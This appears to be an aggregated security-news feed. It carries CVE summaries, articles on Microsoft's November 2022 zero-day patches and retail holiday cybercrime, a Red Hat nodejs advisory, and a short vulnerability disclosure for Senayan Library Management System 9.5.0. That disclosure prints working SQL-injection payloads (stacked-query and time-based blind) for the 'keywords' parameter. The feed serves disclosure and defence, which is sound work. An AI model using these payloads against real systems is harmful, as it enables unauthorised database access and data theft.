SAP GUI allows an authenticated attacker to execute scripts in the local network. On successful exploitation, the attacker can gain access to registries which can cause a limited impact on confidentiality and high impact on availability of the application.

CVE-2022-41205

Long-awaited security fixes for ProxyNotShell and Mark of the Web bypasses are part of a glut of actively exploited zero-day vulnerabilities and other critical flaws that admins need to prioritize in the coming hours.

Microsoft finally patched the publicly known "ProxyNotShell" and Mark of the Web (MotW) security vulnerabilities in its penultimate monthly security update for 2022 — two of six zero-day bugs under active exploit in the wild.

The targeted zero-days are part of a tranche of 68 security fixes for November's Patch Tuesday group, 11 of which are rated critical.

The fixes address CVEs that affect the gamut of the security giant's product line, including Azure, BitLocker, Dynamics, Exchange Server, Office and Office components, Network Policy Server (NPS), SharePoint Server, SysInternals, Visual Studio, Windows and Windows Components, and the Linux kernel and other open source software bugs affecting Microsoft products.

**Actively Exploited Zero-Day Vulnerabilities**

The group of zero-days listed as under active attack is the largest for Microsoft so far this year.

Two of them are the critical ProxyNotShell flaws affecting Exchange Server, first disclosed in September. Both carry a CVSS vulnerability-severity score rating of 8.8 out of 10. The bug tracked as CVE-2022-41040 is a server-side request forgery (SSRF) flaw that enables attackers to elevate privileges on a compromised system, and CVE-2022-41082 is a remote code execution (RCE) flaw when PowerShell is remotely accessible to the attacker. They can be chained together for full "pwning" of an Exchange Server.

"At long last, Microsoft released patches for the ProxyNotShell vulnerabilities that are being actively exploited by Chinese threat actors," Automox researcher Preetham Gurram said in a Nov. 8 analysis. "The elevation of privilege and remote code execution vulnerabilities have been exposed and exploited since late September, so we recommend applying patches within 24 hours if you have vulnerable on-prem or hybrid Exchange Servers where temporary mitigation has not been applied."

Microsoft also addressed the known and analyzed Mark of the Web issues — they're being tracked as CVE-2022-41091 and CVE-2022-41049, two separate vulnerabilities that exist in different versions of Windows. The important-rated bugs both allow attackers to sneak malicious attachments and files past Microsoft's MotW security feature — Microsoft says only the former is being exploited in the wild. 

Another zero-day being used in active campaigns is a critical RCE bug affecting Windows Scripting Languages (CVE-2022-41128, CVSS 8.8). Mike Walters, vice president of vulnerability and threat research at Action1, tells Dark Reading that it specifically affects the JScript9 scripting language, which is Microsoft’s legacy JavaScript dialect, used by the Internet Explorer browser.

"The new zero-day vulnerability … as low complexity, uses the network vector, and requires no privilege to use, but it needs user interaction, such as using a phishing email to convince the victim to visit a malicious server share or website," he explains. "It affects all Windows OS versions starting from Windows 7 and Windows Server 2008 R2. … However, the proof-of-concept has not yet been publicly disclosed."

The remaining two bugs are important-rated elevation of privilege (EoP) issues carrying 7.8 CVSS scores. One is a memory bug that affects Microsoft's next-gen cryptography, the Windows CNG Key Isolation Service (CVE-2022-41125).

"With low privileges required and a local attack vector, this vulnerability does not necessitate any user interaction. Instead, an attacker would have to gain execution privileges on the victim’s device and run a specially crafted application to elevate privileges to exploit this vulnerability," Automox researcher Gina Geisel said in an emailed analysis. "With a long list of Windows 10 and 11 affected (in addition to Win 8.0, 7.0, Server 2008, 2012, 2016, 2019, 2022, and 2022 Azure), this vulnerability exposes industry-leading versions of Windows and could have wide-ranging impacts."

The second exists in Windows Print Spooler (CVE-2022-41073), and Action1's Walters describes it as a relative of last year's PrintNightmare bug.

"Microsoft continues to patch minions of the PrintNightmare vulnerability," he says. "This vulnerability has a local vector through which an attacker can gain system rights on the target server or desktop."

**Critical Bugs of Note for November**

Other issues in November's update that admins should prioritize include a vulnerability in Windows Kerberos RC4-HMAC (CVE-2022-37966). It earns a critical rating (CVSS 8.1), even though an attacker needs to have access and the ability to run code on the target system to exploit it.

That's likely because Kerberos is an authentication protocol to verify a user or the host's identity, noted Automox's Gurram. It provides a token that enables a service to act on behalf of its client when connecting to other services; when used within an organization's domain, it enables single sign-on (SSO).

"The primary encryption type used in Windows is based on the RC4 stream cipher, with an MD5-HMAC algorithm used for the checksum field," Gurram said. "RC4 encryption is considered to be the least secure and most attackable encryption algorithm. If being used for encrypting Kerberos tokens in the Active Directory domain, it can be exploited and take full control of any service accounts."

ZDI's Dustin Childs noted in a blog post that for this bug and another critical-rated issue in Kerberos tracked as CVE-2022-37967 (CVSS 7.2), admins will need to take additional actions beyond just applying the patch.

"Specifically, you’ll need to review KB5020805 and KB5021131 to see the changes made and next steps," he advised. "Microsoft notes this is a phased rollout of fixes, so look for additional updates to further impact the Kerberos functionality."

Childs also flagged three critical-rated fixes for the Point-to-Point Tunneling Protocol (PPTP), all carrying CVSS scores of 8.1, and all allowing RCE (CVE-2022-41039, CVE-2022-41088, and CVE-2022-41044).

"There seems to be a continuing trend of researchers looking for (and finding) bugs in older protocols," Childs said. "If you rely on PPTP, you should really consider upgrading to something more modern."

The remaining critical bugs are as follows:

*   CVE-2022-38015: A denial-of-service (DoS) bug in Hyper-V (CVSS 6.5), which Microsoft said "could allow a Hyper-V guest to affect the functionality of the Hyper-V host.”
*   CVE-2022-41118: An RCE bug affecting the Chakra and Jscript scripting languages (CVSS 7.5)
*   CVE-2022-39327: An Azure CLI RCE bug (no CVSS) — a previously released fix that is just being documented now.

**Patch ASAP**

Even though this month's update is relatively light, admins should get to patching ASAP, according to Bharat Jogi, director of vulnerability and threat research at Qualys — especially with so many zero-day exploits circulating.

"As we approach the holiday season, security teams must be on high alert and increasingly vigilant, as attackers typically ramp up activity during this time (e.g., Log4j, SolarWinds, etc.)," he said in emailed commentary. "It is likely we will see bad actors attempting to take advantage of disclosed zero-days and vulnerabilities released that organizations have left unpatched."

Microsoft Quashes Bevy of Actively Exploited Zero-Days for November Patch Tuesday

Insecure direct object references (IDOR) vulnerability in the wpForo Forum plugin <= 2.0.5 on WordPress allows attackers with subscriber or higher user roles to mark any forum post as private/public.

CVE-2022-40206: wpForo Forum

Server Side Request Forgery (SSRF) vulnerability in All in One SEO Pro plugin <= 4.2.5.1 on WordPress.

CVE-2022-42494: AIOSEO Changelog - AIOSEO

Cross-Site Request Forgery (CSRF) vulnerability in Advanced Dynamic Pricing for WooCommerce plugin <= 4.1.5 on WordPress leading to plugin settings import.

CVE-2022-43491: Advanced Dynamic Pricing for WooCommerce

Retailers and hospitality companies expect to battle credential harvesting, phishing, bots, and various malware variants.

For companies in the retail and hospitality sector, the holiday shopping season represents their busiest time of year, both for sales and fighting cybercrime threats.

This year is no different, with companies in the sector anticipating that phishing, fraud, credential harvesting, and the ever-evolving malware landscape will cast a shadow over their security posture in the coming months, according to a report published by Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) this week.

The 2022 RH-ISAC Holiday Season Threat Trends Summary report polled analysts and members of the industry group about what their security focus is this season — which is defined as the time between Oct. 1 and Dec. 31, when people tend to do their online shopping for holidays that are celebrated in much of the world — as well as what they experienced in the previous 2020 and 2021 holiday seasons. RH-ISAC associate member Flashpoint also provided research and data for the report.

While many threats plaguing the sector have remained consistent over the years, others are evolving rapidly as threat actors develop new malware and exploit fresh vulnerabilities, posing new issues and requiring both reinforcement and change in defense tactics with each season.

**Phishing and Credential Theft**

Retailers cited recurring threats as their biggest worries this year, with phishing — which the organizations noted is a year-round concern — a significant worry that remains consistent. In 2020, nearly 20% of retailers said phishing was the most frequently shared threat among their member exchange, Slack, and the core member listserv boards, while the number was 16% in 2021, according to the report.

Indeed, the holiday season tends to bring a host of socially engineered promotional campaigns aimed at fooling account holders to harvest their credentials and perform other nefarious activities, organizations noted.

Of more concern than phishing, however, is what is often a result of that threat activity: credential harvesting, which 42% and 37% say was the most-shared threat in 2020 and 2021, respectively. Retailers also worry about a rise by threat actors in the use  of info-stealers that harvest customer data purchase don hacker forums, as well as customer account takeover that typically ramps up over the holidays.

Other types of fraud involving gift cards and loyalty cards — with the former allowing threat actors to remain anonymous and thus difficult to track while shopping — will be a focus this year, as well as fraud related to returning items that were not purchased legitimately.

**Evolving Malware Landscape**

The report outlined year-over-year changes between 2020 and 2021 in retail threats linked to malware, bots, and vulnerabilities — results that demonstrate just how quickly this threat landscape in particular can evolve.

Some of these threats, such as QakBot, Emotet, Agent Tesla, and Dridex — remain a constant worry. However, others — such as Log4Shell — emerge quickly and predictably, forcing organizations to pivot in terms of defense, researchers found.

Bots in particular have risen in profile in terms of their impact on online retailers, especially over the past two years, as individuals who otherwise participate in no criminal activity began exploring ways to earn additional income as resellers of stolen information on threat actor forums, according to the report.

"These 'side hustles' support an already thriving ecosystem wherein actors have been scalping high-demand products to sell at high markups," according to the report. "The use of automation to support this activity causes significant negative side effects on the back end and can even lead to DDoS-like disruptions."

Year-over-year changes in malware and bot activity reflect how quickly this threat landscape in particular can change. For example, in 2020, the Emotet banking Trojan and its loader were the top malware threats shared by retailers — 15% and 8%, respectively — while the remote access trojan (RAT) AgentTesla earned 4% of overall mentions.

In 2021, however, AgentTesla rose to greater prominence, with 16% of mentions by retailers, while Emotet virtually disappeared from message boards, respondents said. Moreover, the now infamous Log4j debacle emerged as a threat, with 16% of mentions by retail and hospitality companies.

Retailers say they expect the most prevalent malware and bot activity this holiday season to come from QakBot, Emotet, Agent Tesla, and Dridex, according to the report.

Changes in threat activity so far this year include an increase in imposter websites, and emerging phishing attempts that are either product-focused or impersonated executives. The latter reflects a rise in socially engineered attacks that aimed to harvest credentials and bypass multifactor authentication, retailers say.

**Retail and Hospitality Defenses**

Because of the diversity of the threats the retail and hospitality sector expects to see during the holiday shopping season, the defense tactics they plan to adopt this year also are varied and must encompass both a macro and micro approach to understanding their enemies, they reported.

"Members reported focusing on understanding very specific tactics fraudsters and threat actors are using across kill chains to enhance detection and mitigation efforts," according to the report. "Understanding broad trends across the threat landscape and how they work within member environments has enabled analysts to create more effective alerting, detection, and mitigation efforts."

One tactic they are adopting is to work closely with their respective customer service departments, in part by providing customer service representatives with threat training. They also are maintaining brand protection services to help take down malicious imposter sites, as well as instituting internal fraud working groups to counter threats.

Staffing-wise, retailers and hospitality vendors cite consistency as key, with the need to ensure that those working directly to spot threats have the appropriate experience and knowledge to respond. The companies say they could implement change freezes, staffing adjustments, or other operational changes to prepare for the season, including an improvement in endpoint detection and red team operations to validate threat concerns and highlight areas for improvement, according to the report.

Among the tools and practices the companies find particularly helpful for shoring up security over the holidays: leading vendor threat intelligence platforms and cyber threat intelligence feeds; RH-ISAC community resources and sharing platforms; updated policies and plans; and partnerships with leading cybersecurity associations and nonprofit organizations for additional threat research context.

Retail Sector Prepares for Annual Holiday Cybercrime Onslaught

Red Hat Security Advisory 2022-7821-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include a HTTP request smuggling vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: nodejs:18 security update  
Advisory ID:       RHSA-2022:7821-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7821  
Issue date:        2022-11-08  
CVE Names:         CVE-2022-35255 CVE-2022-35256  
====================================================================  
1. Summary:

An update for the nodejs:18 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

The following packages have been upgraded to a later upstream version:  
nodejs (18.9.1). (BZ#2130559, BZ#2131750)

Security Fix(es):

* nodejs: weak randomness in WebCrypto keygen (CVE-2022-35255)

* nodejs: HTTP Request Smuggling due to incorrect parsing of header fields  
(CVE-2022-35256)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2130517 - CVE-2022-35255 nodejs: weak randomness in WebCrypto keygen  
2130518 - CVE-2022-35256 nodejs: HTTP Request Smuggling due to incorrect parsing of header fields

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-18.9.1-1.module+el8.7.0+16806+4109802b.src.rpm  
nodejs-nodemon-2.0.19-1.module+el8.7.0+16061+0a247725.src.rpm  
nodejs-packaging-2021.06-4.module+el8.7.0+15582+19c314fa.src.rpm

aarch64:  
nodejs-18.9.1-1.module+el8.7.0+16806+4109802b.aarch64.rpm  
nodejs-debuginfo-18.9.1-1.module+el8.7.0+16806+4109802b.aarch64.rpm  
nodejs-debugsource-18.9.1-1.module+el8.7.0+16806+4109802b.aarch64.rpm  
nodejs-devel-18.9.1-1.module+el8.7.0+16806+4109802b.aarch64.rpm  
nodejs-full-i18n-18.9.1-1.module+el8.7.0+16806+4109802b.aarch64.rpm  
npm-8.19.1-1.18.9.1.1.module+el8.7.0+16806+4109802b.aarch64.rpm

noarch:  
nodejs-docs-18.9.1-1.module+el8.7.0+16806+4109802b.noarch.rpm  
nodejs-nodemon-2.0.19-1.module+el8.7.0+16061+0a247725.noarch.rpm  
nodejs-packaging-2021.06-4.module+el8.7.0+15582+19c314fa.noarch.rpm  
nodejs-packaging-bundler-2021.06-4.module+el8.7.0+15582+19c314fa.noarch.rpm

ppc64le:  
nodejs-18.9.1-1.module+el8.7.0+16806+4109802b.ppc64le.rpm  
nodejs-debuginfo-18.9.1-1.module+el8.7.0+16806+4109802b.ppc64le.rpm  
nodejs-debugsource-18.9.1-1.module+el8.7.0+16806+4109802b.ppc64le.rpm  
nodejs-devel-18.9.1-1.module+el8.7.0+16806+4109802b.ppc64le.rpm  
nodejs-full-i18n-18.9.1-1.module+el8.7.0+16806+4109802b.ppc64le.rpm  
npm-8.19.1-1.18.9.1.1.module+el8.7.0+16806+4109802b.ppc64le.rpm

s390x:  
nodejs-18.9.1-1.module+el8.7.0+16806+4109802b.s390x.rpm  
nodejs-debuginfo-18.9.1-1.module+el8.7.0+16806+4109802b.s390x.rpm  
nodejs-debugsource-18.9.1-1.module+el8.7.0+16806+4109802b.s390x.rpm  
nodejs-devel-18.9.1-1.module+el8.7.0+16806+4109802b.s390x.rpm  
nodejs-full-i18n-18.9.1-1.module+el8.7.0+16806+4109802b.s390x.rpm  
npm-8.19.1-1.18.9.1.1.module+el8.7.0+16806+4109802b.s390x.rpm

x86_64:  
nodejs-18.9.1-1.module+el8.7.0+16806+4109802b.x86_64.rpm  
nodejs-debuginfo-18.9.1-1.module+el8.7.0+16806+4109802b.x86_64.rpm  
nodejs-debugsource-18.9.1-1.module+el8.7.0+16806+4109802b.x86_64.rpm  
nodejs-devel-18.9.1-1.module+el8.7.0+16806+4109802b.x86_64.rpm  
nodejs-full-i18n-18.9.1-1.module+el8.7.0+16806+4109802b.x86_64.rpm  
npm-8.19.1-1.18.9.1.1.module+el8.7.0+16806+4109802b.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-35255  
https://access.redhat.com/security/cve/CVE-2022-35256  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2pSJNzjgjWX9erEAQjaww/9FwAgM6VhLuL/A6jOAoTuAbjXIPjLq3bf  
BycFTPsYskS5aXT7hJUyT8WJQobCaw1J0e5c/+QnjJW1/9RNeAfoVNpuGyrnunXA  
4Ferj6qFwWHtzr0b2noQW0mzuOm6Ecen9r30vl58e+mgpmolrDWtf+Wsm/5fxuC4  
9CUfdJ7doifnNbrnmBGNOaINHflSAPo+GUZvvrPozYv74uuE2hmMTzM6rtg5EXqG  
hEI0zLJzTf3KWsKW6iIOWlOA2Kppn7JRsjNK2DQIotSSTmfNhS0AybKfp30Mgyia  
fxcOV0hdFqMq7HrOd/daP61DhhmyAECgYUCrhnVl01ntLQAPmmTmSihOHxrTbZcJ  
HewcOKlos2GgnQAX+DoMREn6KnvFTXT2xU0vO/X8Pbl2TyQ8B89Jb8m3hR71OBnG  
ARBDiEG9yWQaMLqrI9YHcsOR+4DxsXgecjItc3Bd9jbBKkLgnTi1efEjW/SdjU9b  
GWhL/2DVPOT9yg/j/+/me8+3c9O7vnePN7zaxUEoZ0DmdsDKlOzrC/D69thVIqXY  
JSQ8cINZ37RiCNRxcEvMQpwm/y79OCWVGdPptsluBapNDur5qeg2KrDYeHYsMXGF  
X9D6fP1Vod455kt+TxJCijA9XYT0JG7BA+KA5esIT2reCTvgQlP5QaEWqlNI39d4  
z9dijpwH2po=+8w0  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7821-01

An information leakage vulnerability in the Bluetooth Low Energy advertisement scan response in Bluetooth Core Specifications 4.0 through 5.2, and extended scan response in Bluetooth Core Specifications 5.0 through 5.2, may be used to identify devices using Resolvable Private Addressing (RPA) by their response or non-response to specific scan requests from remote addresses. RPAs that have been associated with a specific remote device may also be used to identify a peer in the same manner by using its reaction to an active scan request. This has also been called an allowlist-based side channel.

CVE-2020-35473: ACM CCS 2022

Senayan Library Management System version 9.5.0 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.5.0 a.k.a SLIMS 9 BULIAN SQLi## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0## Description:The `keywords` parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the keywords parameter, and a generalerror message was returned.Two single quotes were then submitted and the error messagedisappeared. The injection is confirmed manually from nu11secur1ty.The attacker can retrieve all information from the database of thissystem, by using this vulnerability.## STATUS: HIGH Vulnerability[+] Payload:```MySQL---Parameter: keywords (GET)    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECTSLEEP(5)#    Type: time-based blind    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)## Proof and Exploit:[href](https://streamable.com/63og5v)## Time spent`3:00`

Senayan Library Management System 9.5.0 SQL Injection

Out-of-Bounds error in GBL parser in Silicon Labs Gecko Bootloader version 4.0.1 and earlier allows attacker to overwrite flash Sign key and OTA decryption key via malicious bootloader upgrade.

Tag

#sap